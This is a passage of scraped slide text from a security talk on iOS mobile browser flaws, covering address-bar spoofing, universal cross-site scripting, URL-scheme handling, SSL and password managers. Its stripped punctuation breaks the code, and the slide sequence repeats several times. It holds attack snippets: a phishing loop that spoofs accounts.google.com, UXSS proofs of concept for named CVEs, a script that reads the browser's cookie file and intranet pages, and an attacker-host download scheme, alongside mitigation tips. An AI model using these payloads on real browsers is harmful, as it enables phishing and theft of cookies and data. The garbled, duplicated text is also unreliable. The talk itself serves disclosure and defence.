bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 29: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/29.jpg)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 30: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/30.jpg)
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 31: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/31.jpg)
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
